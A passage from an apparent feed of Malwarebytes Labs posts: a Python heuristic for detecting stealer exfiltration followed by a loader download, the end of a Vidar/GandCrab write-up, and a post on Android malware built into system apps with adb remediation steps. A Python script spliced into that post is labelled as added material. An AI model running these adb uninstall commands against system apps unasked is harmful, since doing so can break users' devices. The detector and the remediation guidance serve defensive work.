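def parse_line(line: str):
    ts, host, method, url, ctype, size = line.split()
    return datetime.fromisoformat(ts), host, method, url, ctype, int(size)


def find_exfil_then_loader(log_text: str, window: timedelta = WINDOW) -> List[Tuple[str, str]]:
    """Return (posting_host, exe_url) for every zip POST over plain HTTP that is
    followed within `window` by an executable download. The 11:30 upload in the
    sample has no follow-up download and is therefore not reported."""
    records = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                     key=lambda r: r[0])
    hits = []
    for i, (ts, host, method, url, ctype, _) in enumerate(records):
        if method != "POST" or ctype != "application/zip" or not url.startswith("http://"):
            continue
        for ts2, _, method2, url2, _, _ in records[i + 1:]:
            if ts2 - ts > window:
                break
            if method2 == "GET" and url2.lower().endswith(".exe"):
                hits.append((host, url2))
                break
    return hits


if __name__ == "__main__":
    for host, exe in find_exfil_then_loader(SAMPLE_LOG):
        print(f"possible stealer+loader chain: zip POST to {host}, then {exe}")
```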

Ransomware as a last payload

While ransomware experienced a slowdown in 2018, it is still one of the more dangerous threats. In contrast to many other types of malware, ransomware is instantly visible and requires a call to action, whether victims decide to pay the ransom or not.

However, threat actors can use ransomware for a variety of reasons within their playbook. It could be, for instance, a simple decoy where the real goal is to irreversibly corrupt systems without any way to recover lost data. But as we see here, it can be coupled with other threats and used as a last payload when other resources have already been exhausted.

As a result, victims get a double whammy. Not only are they robbed of their financial and personal information, but they are also being extorted to recover the now encrypted data.

Malwarebytes users are protected against this threat at multiple levels. Our signatureless anti-exploit engine mitigates the Internet Explorer and Flash Player exploits delivered by the Fallout exploit kit. We detect the dropped stealer as Spyware.Vidar and also thwart GandCrab via our anti-ransomware module.


Many thanks to Fumik0_ and @siri_urz for their inputs and Vidar payload identification.

Indicators of Compromise (IOCs)

Vidar binary


Vidar C2


Loader URL (GandCrab)


GandCrab binary


The post Vidar and GandCrab: stealer and ransomware combo observed in the wild appeared first on Malwarebytes Labs.


The new landscape of pre-installed mobile malware: malicious code within

Malwarebytes - Wed, 01/02/2019 - 18:15

Here’s a scary thought: Mobile devices may soon come with pre-installed malware on required system apps. While it might sound like a grim foretelling, pre-installed mobile malware is an unfortunate reality of the future.

In the past, we’ve seen pre-installed malware with the notorious Adups threat, among others. “Pre-installed” means the malware comes already installed on a device at the system level, thus, it cannot be removed; only disabled. However, remediating these iterations of pre-installed malware is possible by using a work-around to uninstall apps for the current user. This method involves connecting the mobile device to a PC and using the ADB command line tool. Follow our guide, removal instructions for Adups, to find out more.

Although this method is a bit tedious, it works to remediate the malware. In contrast, remediating newer versions of pre-installed malware has become much more difficult. We are now seeing malware authors target system apps that are required for the device to function properly. By injecting malicious code within these necessary apps, threat actors have reshaped the landscape of pre-installed malware for the worse.

Types of pre-installed apps

There are two types of preinstalled apps, based on the apps’ location on the device. This location also determines the importance of the app.

The first location is /system/app/. Apps in this location are typically something you want to have, but not critical for the device to run. For example, apps that contain functionality for the camera, Bluetooth, FM radio on the device, or photo viewing are stored in this location. This location is also where device manufacturers cache what some may consider bloatware. Uninstalling some of these apps may degrade the user experience, but it isn’t going to stop the device from functioning.

The other location is /system/priv-app/. This is where significantly important apps reside. For instance, apps like Settings and System UI, which include the functionality for the back/home buttons on Android devices, are stored here. In other words, these are apps you absolutely cannot uninstall without essentially breaking the phone. Sadly, the latest pre-installed malware is targeting this location.

The evidence

In light of this new, frightening pre-installed malware, let’s look at two case studies.

Case study 1: Riskware auto installer within System UI

The device is a THL T9 Pro. The infection is Android/PUP.Riskware.Autoins.Fota.INS. Although the code looks similar to the well-known pre-installed malware Adups, it’s entangled within the critical system app System UI, instead of being in a standalone app like UpgradeSys. The infection causes headaches, as it repeatedly installs variants of Android/Trojan.HiddenAds. It’s unknown if this is the doing of Adups themselves, or on the other hand, if code was taken from the Adups Auto Installer and inserted into System UI. Neither scenario is good.

Case Study 2: Monitor within settings

This time, the device is a UTOK Q55. The infection is Android/Monitor.Pipe.Settings. The category “Monitor” is a subset of Potentially Unwanted Programs (PUPs). As the name implies, Monitor apps collect and report sensitive information from the device. Furthermore, this particular Monitor app is hardcoded in the highly-important Settings app. In effect, the app used to uninstall other apps would need to be uninstalled itself to remediate—pure irony.

Attempting to remediate

Here lies the biggest problem with these infections—there is currently no good way to remediate. I have worked with several customers with these infections, but despite my attempts, I have yet to find a good workaround. However, I can offer some guidance. If a clean version of the system app can be found to replace the malicious version, you might be able to replace it. You will want to look for system apps that match the current Android OS version of the device. If found, you can try using the following method:

  • Read the disclaimer from the removal instructions for Adups.
  • Follow the steps under Restoring apps onto the device (without factory reset) in the removal instructions for Adups to save the proper <full path of the apk> of the system app to be replaced.
  • Download a clean version of the system app to your PC.
    • You can use the popular site VirusTotal to determine if it’s clean or not.
  • Move the system app from your PC to your device.
    • adb push <PC file path>\<filename of clean version.apk> /sdcard/Download/<filename of clean version.apk>
  • Uninstall the old, malicious version of the system app.
    • adb shell pm uninstall -k --user 0 <package name of malicious system app>
  • Install the new version of the system app.
    • adb shell pm install -r --user 0 /sdcard/Download/<filename of clean version.apk>
  • See if it works.
    • Common failure errors:
    • If the new version fails to install, you can revert to the old system app.
      • adb shell pm install -r --user 0 <full path of the apk saved from second step>

As noted above, I have yet to find a version of any of the infections encountered that successfully installs. If you need assistance, feel free to post on our forum Mobile Malware Removal Help & Support.
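The push, uninstall, install and revert steps above can be scripted so that a failed install of the clean APK always falls back to the saved original. The Python below is an added example, not the post’s or Malwarebytes’ own tooling; the `run` parameter, the package name and the file paths are assumptions so the control flow can be exercised without a device.

```python
"""Scripted version of the replace-a-system-app procedure above.

Added example, not Malwarebytes' code. It issues the same adb commands the
steps list (push, pm uninstall -k --user 0, pm install -r --user 0) and, if
the clean APK is rejected, reinstalls the APK saved in step two so the
device is not left without its Settings/System UI app. The `run` parameter
is an assumption for testing: it receives the adb argument list and returns
the exit status. Package name and paths are placeholders.
"""
import subprocess
from typing import Callable, List


def adb(args: List[str]) -> int:
    """Default runner: invoke the real adb binary and return its exit code."""
    return subprocess.run(["adb"] + args).returncode


def replace_system_app(package: str, clean_apk: str, saved_apk: str,
                       run: Callable[[List[str]], int] = adb) -> List[str]:
    """Replace a malicious system app for user 0 and return the steps taken.
    The last entry is "installed" on success, "reverted" if the clean APK was
    rejected, or a "*-failed" marker if an earlier step did not complete."""
    # Step four: copy the clean APK to the device's Download folder.
    name = clean_apk.replace("\\", "/").split("/")[-1]
    on_device = "/sdcard/Download/" + name
    steps: List[str] = []
    if run(["push", clean_apk, on_device]) != 0:
        return steps + ["push-failed"]
    steps.append("pushed")
    # Step five: remove the malicious version for the current user only (-k keeps data).
    if run(["shell", "pm", "uninstall", "-k", "--user", "0", package]) != 0:
        return steps + ["uninstall-failed"]
    steps.append("uninstalled")
    # Step six: install the clean version; on failure, put the original back.
    if run(["shell", "pm", "install", "-r", "--user", "0", on_device]) == 0:
        return steps + ["installed"]
    run(["shell", "pm", "install", "-r", "--user", "0", saved_apk])
    return steps + ["reverted"]


if __name__ == "__main__":  # usage: python replace_app.py PKG CLEAN_APK SAVED_APK
    import sys
    print(replace_system_app(*sys.argv[1:4]))
```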

What really can be done?

Currently, the best method to deal with these infections is to:

  1. Stay away from devices with these infections. Here are the manufacturers/models we have seen so far that have been impacted:
    • THL T9 Pro
    • UTOK Q55
    • BLU Studio G2 HD
  2. If you already bought one, return the device.
  3. If you already bought the device and can’t return it, contact the manufacturer.

Extreme frustration

As a mobile malware researcher, it pains me to no end to write about malware we can’t currently remediate. However, the public needs to know that these types of infections exist in the wild. No one should have to tolerate such infections on any mobile device regardless of its price point and/or notoriety. I will continue to look for methods to deal with these infections. In the meantime, stay safe out there.

APK samples

Detection: Android/PUP.Riskware.Autoins.Fota.INS
MD5: 9E0BBF6D26B843FB8FE95FDAD582BB70
Package Name:

Detection: Android/Monitor.Pipe.Settings
MD5: DC267F396FA6F06FC7F70CFE845B39D7
Package Name:

The post The new landscape of pre-installed mobile malware: malicious code within appeared first on Malwarebytes Labs.
